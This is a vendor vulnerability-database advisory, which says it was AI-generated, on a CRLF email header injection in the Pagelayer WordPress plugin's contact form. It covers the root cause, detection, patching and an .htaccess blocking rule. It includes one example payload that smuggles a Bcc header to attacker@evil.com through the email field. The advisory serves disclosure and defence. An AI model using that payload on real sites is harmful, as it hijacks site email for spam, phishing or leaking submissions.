Join the Cyber Forum: Threat Intel on May 12, 2026 to learn how AI is reshaping threat defense.Join the Virtual Cyber Forum: Threat IntelRegister Now
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2026-2442

CVE-2026-2442: WordPress Pagelayer CRLF Injection Flaw

CVE-2026-2442 is a CRLF injection vulnerability in the Pagelayer WordPress plugin that allows unauthenticated attackers to inject arbitrary email headers. This article covers technical details, affected versions, and mitigation.

Published: April 2, 2026

CVE-2026-2442 Overview

The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress contains a CRLF Injection vulnerability (CWE-93) in all versions up to and including 2.0.7. This vulnerability exists in the contact form handler, which performs placeholder substitution on attacker-controlled form fields and subsequently passes the resulting values into email headers without properly sanitizing CR/LF (Carriage Return/Line Feed) characters. This allows unauthenticated attackers to inject arbitrary email headers such as Bcc and Cc, effectively abusing the form's email delivery functionality through the email parameter when targeting a contact form configured to use placeholders in mail template headers.

Critical Impact

Unauthenticated attackers can inject arbitrary email headers to hijack email functionality, potentially enabling spam campaigns, phishing attacks, or sensitive information disclosure through manipulated email delivery.

Affected Products

  • Page Builder: Pagelayer – Drag and Drop website builder for WordPress versions ≤ 2.0.7

Discovery Timeline

  • 2026-03-28 - CVE CVE-2026-2442 published to NVD
  • 2026-03-30 - Last updated in NVD database

Technical Details for CVE-2026-2442

Vulnerability Analysis

The vulnerability stems from improper handling of user-supplied input in the Pagelayer plugin's contact form functionality. When the plugin processes contact form submissions, it performs placeholder substitution using values provided by the user. These substituted values are then incorporated directly into email headers without adequate sanitization.

The core issue is the failure to remove or encode CRLF sequences (\r\n or %0d%0a) from user input before constructing email headers. In email protocols (SMTP), headers are separated by CRLF sequences, meaning an attacker who can inject these characters can effectively terminate the current header and introduce new ones.

This vulnerability requires the target contact form to be configured to use placeholders within mail template headers, which is a common configuration pattern for personalized email responses.

Root Cause

The root cause is inadequate input validation and sanitization in the contact form handler. Specifically, the plugin fails to strip or encode CR (Carriage Return - \r or %0d) and LF (Line Feed - \n or %0a) characters from form field values before they are substituted into email headers. This violates the security principle of input sanitization before use in security-sensitive contexts like email header construction.

Attack Vector

The attack can be executed remotely over the network by any unauthenticated user. An attacker identifies a WordPress site using the Pagelayer plugin with a contact form that utilizes placeholder substitution in email headers. The attacker then crafts a malicious form submission containing CRLF sequences followed by additional email headers in the email parameter or other form fields used in header placeholders.

For example, an attacker could inject victim@example.com%0d%0aBcc:attacker@evil.com into the email field, causing the form to send a copy of all form submissions to the attacker's address. This technique can also be used to inject Cc headers, modify reply-to addresses, or add other arbitrary headers to manipulate email routing and content.

Technical details regarding the specific code changes can be found in the WordPress Plugin Changeset.

Detection Methods for CVE-2026-2442

Indicators of Compromise

  • Unusual patterns in web server logs showing URL-encoded CRLF sequences (%0d%0a, %0D%0A) in POST request parameters to contact form endpoints
  • Email logs showing unexpected Bcc or Cc recipients on emails originating from WordPress contact forms
  • Reports of spam or phishing emails originating from your domain's WordPress contact forms
  • Increased email sending volume from WordPress-associated mail accounts

Detection Strategies

  • Implement Web Application Firewall (WAF) rules to detect and block CRLF sequences in form submissions, particularly in email-related fields
  • Enable detailed logging for the WordPress mail system to monitor for anomalous header injection patterns
  • Deploy SentinelOne Singularity to monitor for suspicious web application behavior and potential exploitation attempts

Monitoring Recommendations

  • Review email server logs for unusual header patterns or unexpected recipient additions
  • Monitor WordPress plugin versions and ensure timely updates to patched versions
  • Implement alerting on contact form submission anomalies, particularly those containing encoded special characters

How to Mitigate CVE-2026-2442

Immediate Actions Required

  • Update the Pagelayer plugin to a version newer than 2.0.7 immediately
  • Audit contact forms for configurations using placeholders in email headers and consider removing header-based placeholders until patching is complete
  • Implement server-side input validation to strip CRLF sequences from all user-supplied form data

Patch Information

The vulnerability has been addressed by the plugin developers. The fix can be reviewed in the WordPress Plugin Changeset. Update the Pagelayer plugin through the WordPress admin dashboard or manually download the patched version from the WordPress plugin repository. For detailed vulnerability information, refer to the Wordfence Vulnerability Report.

Workarounds

  • Temporarily disable contact forms that use placeholder substitution in email headers until the plugin is updated
  • Implement server-level input filtering using .htaccess rules or web server configurations to block requests containing CRLF sequences
  • Use a Web Application Firewall (WAF) to filter malicious input patterns before they reach the WordPress application
bash
# Example Apache .htaccess rule to block CRLF injection attempts
RewriteEngine On
RewriteCond %{QUERY_STRING} (%0d|%0a|%0D|%0A) [NC,OR]
RewriteCond %{REQUEST_BODY} (%0d|%0a|%0D|%0A) [NC]
RewriteRule .* - [F,L]

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeOther

  • Vendor/TechPagelayer

  • SeverityMEDIUM

  • CVSS Score5.3

  • EPSS Probability0.08%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityNone
  • CWE References
  • CWE-93
  • Technical References
  • WordPress Plugin Changeset

  • Wordfence Vulnerability Report
  • Related CVEs
  • CVE-2026-39469: PageLayer Information Disclosure Flaw
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English